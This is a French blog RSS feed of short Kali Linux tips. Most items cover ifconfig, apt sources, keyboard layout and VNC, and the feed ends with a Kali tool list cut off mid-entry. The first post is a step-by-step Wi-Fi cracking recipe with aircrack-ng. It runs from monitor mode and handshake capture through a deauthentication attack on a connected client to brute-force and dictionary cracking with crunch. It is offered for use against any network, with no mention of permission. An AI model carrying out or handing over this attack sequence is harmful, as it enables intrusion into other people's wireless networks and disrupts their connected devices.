<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
	<title>Hack4.Info - Tag raspberry-pi</title>
	<link>https://www.hack4.info/index.php?tag/raspberry-pi</link>
	<language>fr</language>
	<description>Bidouillage &amp; informations</description>
<atom:link xmlns:atom="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="https://www.hack4.info/feed.php?rss" />
	<lastBuildDate>Sat, 17 Sep 2016 20:55:00 +0200</lastBuildDate>
	<generator>PluXml</generator>
	<item>
		<title>Cracker un reseau Wifi avec Aircrack-ng sur Kali Linux</title> 
		<link>https://www.hack4.info/index.php?article20/cracker-un-reseau-wifi-avec-aircrack-ng-sur-kali-linux</link>
		<guid>https://www.hack4.info/index.php?article20/cracker-un-reseau-wifi-avec-aircrack-ng-sur-kali-linux</guid>
		<description>&lt;p&gt;Voici la liste des commandes à taper pour cracker un code Wifi. En rouge les informations à changer.&lt;/p&gt;
&lt;p&gt;Lister les cartes Wifi :&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;airmon-ng&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Mettre la carte Wifi en mode ecoute (on remplace wlan1 par la carte):&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;airmon-ng start &lt;font color=red&gt;wlan1&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Voir les réseaux Wifi :&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;airodump-ng &lt;font color=red&gt;wlan1mon&lt;/font&gt; (On note le BSSID, le CH et le ESSID)&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Trouver l&#039;adresse MAC d&#039;une station connectée : (on laisse tourner ce terminal)&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;airodump-ng &lt;font color=red&gt;wlan1mon&lt;/font&gt; --bssid &lt;font color=red&gt;BSSID&lt;/font&gt; --channel &lt;font color=red&gt;CH&lt;/font&gt; --write &lt;font color=red&gt;nom_fichier&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Attaque de la cible : (dans un nouveau terminal)&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;aireplay-ng -0 0 -a  &lt;font color=red&gt;BSSID&lt;/font&gt; -c &lt;font color=red&gt;MAC&lt;/font&gt;  &lt;font color=red&gt;wlan1mon&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;On retrouve le &quot;nom_fichier.cap&quot; pour la suite&lt;/p&gt;
&lt;p&gt;On decrypte le password Wifi fait de chiffre (4 à 8 chiffres) : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;crunch 4 8 0123456789 | aircrack-ng -e &lt;font color=red&gt;ESSID&lt;/font&gt; -w - &lt;font color=red&gt;nom_fichier.cap&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;On decrypte le password Wifi fait de lettre et chiffre (4 à 8 caractères) : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;crunch 4 8 abcdefghilaopqrsabcuefghilmnopqrstvz0123456789 | aircrack-ng -e &lt;font color=red&gt;ESSID&lt;/font&gt; -w - &lt;font color=red&gt;nom_fichier.cap&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;On decrypte le password Wifi grâce à un dictionnaire : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;aircrack-ng -w dico.txt -0 &lt;font color=red&gt;nom_fichier.cap&lt;/font&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Pour le dictionnaire il exite des dicos de password et mots en tout genre sur le web, on vous laisse chercher :)&lt;/p&gt;</description>
		<pubDate>Sat, 17 Sep 2016 20:55:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Identifier les interfaces réseau sous Kali Linux</title> 
		<link>https://www.hack4.info/index.php?article21/identifier-les-interfaces-reseau-sous-kali-linux</link>
		<guid>https://www.hack4.info/index.php?article21/identifier-les-interfaces-reseau-sous-kali-linux</guid>
		<description>&lt;p&gt;Tapez la commande :&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;ifconfig&lt;/li&gt;&lt;/ul&gt;</description>
		<pubDate>Fri, 16 Sep 2016 00:38:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Mettre a jour la liste des sources sur Kali Linux</title> 
		<link>https://www.hack4.info/index.php?article18/mettre-a-jour-la-liste-des-sources-sur-kali-linux</link>
		<guid>https://www.hack4.info/index.php?article18/mettre-a-jour-la-liste-des-sources-sur-kali-linux</guid>
		<description>&lt;p&gt;Executez la commande : &lt;/p&gt;
&lt;p&gt;echo &quot;#Security updates&lt;br&gt;
deb http://http.kali.org/kali kali main non-free contrib&lt;br&gt;
deb http://security.kali.org/kali-security kali/updates main contrib non-free&lt;br&gt;
&lt;br&gt;
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main contrib non-free&lt;br&gt;
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali-dev main/debian-installer&lt;br&gt;
&lt;br&gt;
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali main contrib non-free&lt;br&gt;
deb [arch=i386,amd64,armel,armhf] http://http.kali.org/kali kali main/debian-installer&lt;br&gt;
deb http://repo.kali.org/kali kali-bleeding-edge main&lt;br&gt;
&lt;br&gt;
deb-src http://http.kali.org/kali kali main non-free contrib&lt;br&gt;
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free&lt;br&gt;
deb-src http://http.kali.org/kali kali main contrib non-free&lt;br&gt;
deb-src http://http.kali.org/kali kali-dev main contrib non-free&quot; &gt;&gt; /etc/apt/sources.list&lt;/p&gt;

&lt;p&gt;Voir la liste ici : https://docs.kali.org/general-use/kali-linux-sources-list-repositories&lt;/p&gt;</description>
		<pubDate>Thu, 15 Sep 2016 03:16:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Décompresser des archives avec le gestionnaire de fichier de Kali Linux</title> 
		<link>https://www.hack4.info/index.php?article17/decompresser-des-archives-avec-le-gestionnaire-de-fichier-de-kali-linux</link>
		<guid>https://www.hack4.info/index.php?article17/decompresser-des-archives-avec-le-gestionnaire-de-fichier-de-kali-linux</guid>
		<description>&lt;p&gt;Installez file-roller avec la commande :&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;apt-get install file-roller&lt;/li&gt;&lt;/ul&gt;</description>
		<pubDate>Wed, 14 Sep 2016 11:05:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Passer le clavier QWERTY en AZERTY sur Kali Linux</title> 
		<link>https://www.hack4.info/index.php?article16/passer-le-clavier-qwerty-en-azerty-sur-kali-linux</link>
		<guid>https://www.hack4.info/index.php?article16/passer-le-clavier-qwerty-en-azerty-sur-kali-linux</guid>
		<description>&lt;p&gt;Pour passer le clavier en AZERTY il suffit de taper la commande suivante : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;setxkbmap fr&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;et les commandes pour mettre en français :&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;loadkeys fr&lt;/li&gt;
&lt;li&gt;loadkeys fr-pc&lt;/li&gt;
&lt;li&gt;dpkg-reconfigure keyboard-configuration&lt;/li&gt;&lt;/ul&gt;</description>
		<pubDate>Tue, 13 Sep 2016 10:27:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Controler son Raspberry Kali Linux avec un pc sous VNC</title> 
		<link>https://www.hack4.info/index.php?article15/controler-son-raspberry-kali-linux-avec-un-pc-sous-vnc</link>
		<guid>https://www.hack4.info/index.php?article15/controler-son-raspberry-kali-linux-avec-un-pc-sous-vnc</guid>
		<description>&lt;p&gt;Téléchargez VNC et installez le client sur votre ordinateur : https://www.realvnc.com/download/vnc/&lt;/p&gt;
&lt;p&gt;Dans votre raspberry installez le serveur VNC avec la commande suivante : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;apt-get install x11vnc -y&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Puis tapez cette commande : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;startx &amp;&lt;/li&gt;&lt;/ul&gt;
&lt;p&gt;Puis activez le serveur VNC avec cette commande : (il faudra taper cette commande pour lancer VNC à chaque redémarrage)&lt;/p&gt;
&lt;ul&gt;&lt;li&gt;x11vnc &amp;&lt;/li&gt;&lt;/ul&gt;</description>
		<pubDate>Mon, 12 Sep 2016 01:41:00 +0200</pubDate>
		<dc:creator>hack4</dc:creator>
	</item>
	<item>
		<title>Installer un module sur Kali Linux</title> 
		<link>https://www.hack4.info/index.php?article14/installer-un-module-sur-kali-linux</link>
		<guid>https://www.hack4.info/index.php?article14/installer-un-module-sur-kali-linux</guid>
		<description>&lt;p&gt;Pour installer un module sur kali linux il suffit de taper la commande : &lt;/p&gt;
&lt;ul&gt;&lt;li&gt;apt-get install nom_du_module&lt;/li&gt;&lt;/ul&gt;

&lt;div class=&quot;l-section-h i-cf&quot;&gt;&lt;div class=&quot;g-cols vc_row type_default valign_top&quot;&gt;&lt;div class=&quot;vc_col-sm-3 wpb_column vc_column_container&quot;&gt;&lt;div class=&quot;vc_column-inner&quot;&gt;&lt;div class=&quot;wpb_wrapper&quot;&gt;
	&lt;div class=&quot;wpb_text_column &quot;&gt;
		&lt;div class=&quot;wpb_wrapper&quot;&gt;
			&lt;h5&gt;Information Gathering&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/acccheck&quot; title=&quot;acccheck&quot;&gt;acccheck&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/ace-voip&quot; title=&quot;ace-voip&quot;&gt;ace-voip&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/amap&quot; title=&quot;Amap&quot;&gt;Amap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/arp-scan&quot; title=&quot;arp-scan&quot;&gt;arp-scan&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/automater&quot; title=&quot;Automater&quot;&gt;Automater&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/bing-ip2hosts&quot; title=&quot;bing-ip2hosts&quot;&gt;bing-ip2hosts&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/braa&quot; title=&quot;braa&quot;&gt;braa&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/casefile&quot; title=&quot;CaseFile&quot;&gt;CaseFile&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/cdpsnarf&quot; title=&quot;CDPSnarf&quot;&gt;CDPSnarf&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/cisco-torch&quot; title=&quot;cisco-torch&quot;&gt;cisco-torch&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/cookie-cadger&quot; title=&quot;Cookie Cadger&quot;&gt;Cookie Cadger&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/copy-router-config&quot; title=&quot;copy-router-config&quot;&gt;copy-router-config&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dmitry&quot; title=&quot;DMitry&quot;&gt;DMitry&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dnmap&quot; title=&quot;dnmap&quot;&gt;dnmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dnsenum&quot; title=&quot;dnsenum&quot;&gt;dnsenum&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dnsmap&quot; title=&quot;dnsmap&quot;&gt;dnsmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dnsrecon&quot; title=&quot;DNSRecon&quot;&gt;DNSRecon&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dnstracer&quot; title=&quot;dnstracer&quot;&gt;dnstracer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dnswalk&quot; title=&quot;dnswalk&quot;&gt;dnswalk&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dotdotpwn&quot; title=&quot;DotDotPwn&quot;&gt;DotDotPwn&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/enum4linux&quot; title=&quot;enum4linux&quot;&gt;enum4linux&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/enumiax&quot; title=&quot;enumIAX&quot;&gt;enumIAX&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/eyewitness&quot; title=&quot;EyeWitness&quot;&gt;EyeWitness&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/faraday&quot; title=&quot;Faraday&quot;&gt;Faraday&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/fierce&quot; title=&quot;Fierce&quot;&gt;Fierce&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/firewalk&quot; title=&quot;Firewalk&quot;&gt;Firewalk&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/fragroute&quot; title=&quot;fragroute&quot;&gt;fragroute&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/fragrouter&quot; title=&quot;fragrouter&quot;&gt;fragrouter&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/ghost-phisher&quot; title=&quot;Ghost Phisher&quot;&gt;Ghost Phisher&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/golismero&quot; title=&quot;GoLismero&quot;&gt;GoLismero&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/goofile&quot; title=&quot;goofile&quot;&gt;goofile&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/hping3&quot; title=&quot;hping3&quot;&gt;hping3&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/ident-user-enum&quot; title=&quot;ident-user-enum&quot;&gt;ident-user-enum&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/inspy&quot; title=&quot;InSpy&quot;&gt;InSpy&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/intrace&quot; title=&quot;InTrace&quot;&gt;InTrace&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/ismtp&quot; title=&quot;iSMTP&quot;&gt;iSMTP&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/lbd&quot; title=&quot;lbd&quot;&gt;lbd&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/maltego-teeth&quot; title=&quot;Maltego Teeth&quot;&gt;Maltego Teeth&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/masscan&quot; title=&quot;masscan&quot;&gt;masscan&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/metagoofil&quot; title=&quot;Metagoofil&quot;&gt;Metagoofil&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/miranda&quot; title=&quot;Miranda&quot;&gt;Miranda&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/nbtscan-unixwiz&quot; title=&quot;nbtscan-unixwiz&quot;&gt;nbtscan-unixwiz&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/nmap&quot; title=&quot;Nmap&quot;&gt;Nmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/ntop&quot; title=&quot;ntop&quot;&gt;ntop&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/osrframework&quot; title=&quot;OSRFramework&quot;&gt;OSRFramework&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/p0f&quot; title=&quot;p0f&quot;&gt;p0f&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/parsero&quot; title=&quot;Parsero&quot;&gt;Parsero&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/recon-ng&quot; title=&quot;Recon-ng&quot;&gt;Recon-ng&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/set&quot; title=&quot;SET&quot;&gt;SET&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/smbmap&quot; title=&quot;SMBMap&quot;&gt;SMBMap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/smtp-user-enum&quot; title=&quot;smtp-user-enum&quot;&gt;smtp-user-enum&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/snmp-check&quot; title=&quot;snmp-check&quot;&gt;snmp-check&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/sparta&quot; title=&quot;SPARTA&quot;&gt;SPARTA&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/sslcaudit&quot; title=&quot;sslcaudit&quot;&gt;sslcaudit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/sslsplit&quot; title=&quot;SSLsplit&quot;&gt;SSLsplit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/sslstrip&quot; title=&quot;sslstrip&quot;&gt;sslstrip&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/sslyze&quot; title=&quot;SSLyze&quot;&gt;SSLyze&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/sublist3r&quot; title=&quot;Sublist3r&quot;&gt;Sublist3r&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/thc-ipv6&quot; title=&quot;THC-IPV6&quot;&gt;THC-IPV6&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/theharvester&quot; title=&quot;theHarvester&quot;&gt;theHarvester&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/tlssled&quot; title=&quot;TLSSLed&quot;&gt;TLSSLed&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/twofi&quot; title=&quot;twofi&quot;&gt;twofi&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/urlcrazy&quot; title=&quot;URLCrazy&quot;&gt;URLCrazy&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/wireshark&quot; title=&quot;Wireshark&quot;&gt;Wireshark&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/wol-e&quot; title=&quot;WOL-E&quot;&gt;WOL-E&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/xplico&quot; title=&quot;Xplico&quot;&gt;Xplico&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;

		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;vc_col-sm-3 wpb_column vc_column_container&quot;&gt;&lt;div class=&quot;vc_column-inner&quot;&gt;&lt;div class=&quot;wpb_wrapper&quot;&gt;
	&lt;div class=&quot;wpb_text_column &quot;&gt;
		&lt;div class=&quot;wpb_wrapper&quot;&gt;
			&lt;h5&gt;Vulnerability Analysis&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/bbqsql&quot; title=&quot;BBQSQL&quot;&gt;BBQSQL&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/bed&quot; title=&quot;BED&quot;&gt;BED&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/cisco-auditing-tool&quot; title=&quot;cisco-auditing-tool&quot;&gt;cisco-auditing-tool&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/cisco-global-exploiter&quot; title=&quot;cisco-global-exploiter&quot;&gt;cisco-global-exploiter&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/cisco-ocs&quot; title=&quot;cisco-ocs&quot;&gt;cisco-ocs&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/cisco-torch&quot; title=&quot;cisco-torch&quot;&gt;cisco-torch&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/copy-router-config&quot; title=&quot;copy-router-config&quot;&gt;copy-router-config&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/dbpwaudit&quot; title=&quot;DBPwAudit&quot;&gt;DBPwAudit&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/doona&quot; title=&quot;Doona&quot;&gt;Doona&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/dotdotpwn&quot; title=&quot;DotDotPwn&quot;&gt;DotDotPwn&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/hexorbase&quot; title=&quot;HexorBase&quot;&gt;HexorBase&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/inguma&quot; title=&quot;Inguma&quot;&gt;Inguma&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/jsql&quot; title=&quot;jSQL Injection&quot;&gt;jSQL Injection&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/lynis&quot; title=&quot;Lynis&quot;&gt;Lynis&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/nmap&quot; title=&quot;Nmap&quot;&gt;Nmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/ohrwurm&quot; title=&quot;ohrwurm&quot;&gt;ohrwurm&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/openvas&quot; title=&quot;openvas&quot;&gt;openvas&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/oscanner&quot; title=&quot;Oscanner&quot;&gt;Oscanner&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/powerfuzzer&quot; title=&quot;Powerfuzzer&quot;&gt;Powerfuzzer&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sfuzz&quot; title=&quot;sfuzz&quot;&gt;sfuzz&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sidguesser&quot; title=&quot;SidGuesser&quot;&gt;SidGuesser&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/siparmyknife&quot; title=&quot;SIPArmyKnife&quot;&gt;SIPArmyKnife&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlmap&quot; title=&quot;sqlmap&quot;&gt;sqlmap&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlninja&quot; title=&quot;Sqlninja&quot;&gt;Sqlninja&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/sqlsus&quot; title=&quot;sqlsus&quot;&gt;sqlsus&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/thc-ipv6&quot; title=&quot;THC-IPV6&quot;&gt;THC-IPV6&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/tnscmd10g&quot; title=&quot;tnscmd10g&quot;&gt;tnscmd10g&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/unix-privesc-check&quot; title=&quot;unix-privesc-check&quot;&gt;unix-privesc-check&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/yersinia&quot; title=&quot;Yersinia&quot;&gt;Yersinia&lt;/a&gt;  &lt;/li&gt;&lt;/ul&gt;
&lt;h5&gt;Exploitation Tools&lt;/h5&gt;
&lt;hr&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul class=&quot;lcp_catlist&quot; id=&quot;lcp_instance_0&quot;&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/armitage&quot; title=&quot;Armitage&quot;&gt;Armitage&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/backdoor-factory&quot; title=&quot;Backdoor Factory&quot;&gt;Backdoor Factory&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/beef-xss&quot; title=&quot;BeEF&quot;&gt;BeEF&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/cisco-auditing-tool&quot; title=&quot;cisco-auditing-tool&quot;&gt;cisco-auditing-tool&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/cisco-global-exploiter&quot; title=&quot;cisco-global-exploiter&quot;&gt;cisco-global-exploiter&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/vulnerability-analysis/cisco-ocs&quot; title=&quot;cisco-ocs&quot;&gt;cisco-ocs&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/information-gathering/cisco-torch&quot; title=&quot;cisco-torch&quot;&gt;cisco-torch&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/commix&quot; title=&quot;Commix&quot;&gt;Commix&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/wireless-attacks/crackle&quot; title=&quot;crackle&quot;&gt;crackle&lt;/a&gt;  &lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://tools.kali.org/exploitation-tools/exploitdb&quot; 